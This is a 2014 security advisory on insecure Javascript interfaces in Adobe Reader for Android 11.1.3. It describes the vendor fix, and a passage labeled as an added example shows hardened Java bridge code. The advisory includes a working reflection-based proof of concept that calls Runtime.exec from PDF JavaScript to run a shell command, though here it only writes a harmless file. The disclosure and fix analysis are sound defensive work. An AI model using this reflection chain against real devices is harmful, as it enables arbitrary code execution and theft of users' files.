Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution

Author: Yorick Koster
Platform: android
Release date: 2014-04-15

------------------------------------------------------------------------
Adobe Reader for Android exposes insecure Javascript interfaces
------------------------------------------------------------------------
Yorick Koster, April 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Adobe Reader for Android
version 11.1.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Adobe released version 11.2.0 of Adobe Reader, which adds
@JavascriptInterface [3] annotations to the public methods that are
meant to be exposed through the Javascript interfaces. In addition, the
app now targets API Level 17 and contains a static method
(shouldInitializeJavaScript()) that checks the device's Android
version.

http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.

The following classes expose one or more Javascript interfaces:

- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView

The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.

------------------------------------------------------------------------
PDF Javascript APIs
------------------------------------------------------------------------
It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javascript
objects are prefixed with an underscore character.

public class ARJavaScript
{
    [...]

    public ARJavaScript(ARViewerActivity paramARViewerActivity)
    {
        [...]
        this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");
        this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");
        this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");
        this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");
        this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");
        this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");
        this.mWebView.setWebViewClient(new ARJavaScript.1(this));
        this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
    }
}

An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.
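As an added example (not code from the advisory or from Adobe Reader), the hardened form of the bridge pattern quoted above, following the Fix section: a bridge whose exposed methods carry @JavascriptInterface and that is only attached on Android versions where the annotation is enforced. The class name, the alert body, and the exact behaviour of the version gate are assumptions, and the example assumes the app's manifest sets targetSdkVersion 17 or higher.

```java
import android.content.Context;
import android.os.Build;
import android.os.Handler;
import android.os.Looper;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.widget.Toast;

// Hypothetical hardened replacement for the "_app" bridge (added example, not Adobe's code).
// Requires targetSdkVersion >= 17 in the manifest: only then does the WebView restrict page
// JavaScript to methods annotated with @JavascriptInterface, so getClass() and the other
// public methods inherited from Object are no longer reachable from a PDF's script.
public class SafeAppBridge {
    private final Context mContext;
    private final Handler mUiHandler = new Handler(Looper.getMainLooper());

    private SafeAppBridge(Context context) {
        mContext = context.getApplicationContext();
    }

    // Exposed to document JavaScript as _app.alert(message, icon), mirroring the call in
    // the advisory's PoC. Bridge methods run on a WebView background thread, so UI work
    // is posted to the main thread. The icon parameter is accepted but unused here.
    @JavascriptInterface
    public void alert(final String message, int icon) {
        mUiHandler.post(new Runnable() {
            @Override
            public void run() {
                Toast.makeText(mContext, message, Toast.LENGTH_SHORT).show();
            }
        });
    }

    // Not annotated: with the manifest above this public method stays unreachable from
    // JavaScript, which is the property the 11.1.3 bridges lacked.
    public void persistSettings() { /* app-internal only */ }

    // Assumed behaviour of the version gate the advisory mentions: the annotation is only
    // enforced on Android 4.2 (API 17) and later, so on older devices the bridge is not
    // attached at all rather than attached in its exploitable form.
    public static boolean shouldInitializeJavaScript() {
        return Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1;
    }

    public static void attach(WebView webView, Context context) {
        if (!shouldInitializeJavaScript()) {
            return; // document JavaScript gets no Java bridge on pre-4.2 devices
        }
        webView.addJavascriptInterface(new SafeAppBridge(context), "_app");
    }
}
```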

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept [5] will create a text file in the app
sandbox.

function execute(bridge, cmd) {
    return bridge.getClass().forName('java.lang.Runtime')
        .getMethod('getRuntime', null).invoke(null, null).exec(cmd);
}

if (window._app) {
    try {
        var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
        execute(window._app, ['/system/bin/sh', '-c', 'echo \"Lorem ipsum\" > ' + path]);
        window._app.alert(path + ' created', 3);
    } catch (e) {
        window._app.alert(e, 0);
    }
}

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3] http://developer.android.com/reference/android/webkit/JavascriptInterface.html
[4] http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf